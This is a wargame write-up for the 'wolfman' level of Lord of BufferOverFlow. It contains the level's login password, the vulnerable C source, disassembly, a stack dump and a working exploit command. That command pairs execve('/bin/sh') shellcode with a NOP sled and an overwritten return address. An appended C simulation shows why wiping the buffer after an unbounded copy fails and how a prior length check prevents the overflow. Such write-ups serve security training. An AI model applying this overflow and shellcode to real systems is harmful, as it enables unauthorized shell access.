[Lord Of BufferOverFlow] No. 5: orc -> wolfman

2021. 2. 25. 17:15·Write-Up/LOB(lord of bufferoverflow)

login : orc

password : cantata

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

This is the same as the previous problem, except that a buffer hunter is added at the end.

memset zeroes buffer, so nothing can be placed in buffer.

 

0x8048595 <main+149>:   je     0x80485b0 <main+176>
0x8048597 <main+151>:   push   $0x804864c
0x804859c <main+156>:   call   0x8048410 <printf>
0x80485a1 <main+161>:   add    $0x4,%esp
0x80485a4 <main+164>:   push   $0x0
0x80485a6 <main+166>:   call   0x8048420 <exit>
0x80485ab <main+171>:   add    $0x4,%esp
0x80485ae <main+174>:   mov    %esi,%esi
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   push   %edx
0x80485b9 <main+185>:   lea    0xffffffd8(%ebp),%eax
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    $0x8,%esp
0x80485c5 <main+197>:   lea    0xffffffd8(%ebp),%eax
0x80485c8 <main+200>:   push   %eax
0x80485c9 <main+201>:   push   $0x8048669
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    $0x8,%esp
0x80485d6 <main+214>:   push   $0x28
0x80485d8 <main+216>:   push   $0x0

0xbffffc28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc48:     0x00000000      0x38366900      0x682f0036      0x2f656d6f
0xbffffc58:     0x2f63726f      0x706d6574      0x61616100      0x61616161
0xbffffc68:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc78:     0x61616161      0x61616161      0x61616161      0x61616161
0xbffffc88:     0x61616161      0xbfbfbf61      0x454c00bf      0x504f5353

./wolfman `python -c 'print "\x90"*15 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x90"*4 + "\x68\xfc\xff\xbf"'`

 

love eyuna
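
Added example (not part of the original post or the wargame's code): a simulation of the frame layout the disassembly shows, with buffer at ebp-0x28 followed by saved EBP and the return address. It shows that wiping buffer after an unbounded copy leaves the overwritten return address in place, next to a length check that rejects the input before any byte is copied. The byte array frame, the value ORIG_RET and the all-'A' input are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN   40             /* char buffer[40], located at ebp-0x28 */
#define FRAME_LEN (BUF_LEN + 8)  /* + saved EBP (4) + return address (4) */
#define ORIG_RET  0x11223344u    /* constructed stand-in for the saved return address */

/* Byte array standing in for buffer..return address; the real stack is never touched. */
static unsigned char frame[FRAME_LEN];

static void frame_reset(void)
{
    memset(frame, 0, sizeof frame);
    for (int i = 0; i < 4; i++)          /* store ORIG_RET little-endian at 44..47 */
        frame[BUF_LEN + 4 + i] = (ORIG_RET >> (8 * i)) & 0xff;
}

static uint32_t frame_ret(void)          /* little-endian read of offsets 44..47 */
{
    return frame[44] | (uint32_t)frame[45] << 8 |
           (uint32_t)frame[46] << 16 | (uint32_t)frame[47] << 24;
}

/* Order used by the challenge: unbounded copy, then wipe buffer[0..39] only. */
uint32_t unchecked_then_wipe(size_t arg_len)
{
    if (arg_len > FRAME_LEN) arg_len = FRAME_LEN;  /* keep the simulation in bounds */
    frame_reset();
    memset(frame, 'A', arg_len);         /* models strcpy(buffer, argv[1]), input of 0x41 bytes */
    memset(frame, 0, BUF_LEN);           /* models the "buffer hunter" */
    return frame_ret();                  /* bytes 40..47 were never wiped */
}

/* Hardened order: reject anything that does not fit before copying a byte. */
int checked_copy(size_t arg_len)
{
    frame_reset();
    if (arg_len >= BUF_LEN) return -1;   /* keep room for the terminating NUL */
    memset(frame, 'A', arg_len);         /* frame_reset() already zeroed the NUL slot */
    return 0;
}

int main(void)
{
    printf("copy then wipe, 48 bytes: ret=0x%08x\n", (unsigned)unchecked_then_wipe(48));
    printf("checked copy,   48 bytes: %d\n", checked_copy(48));
    return 0;
}
```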
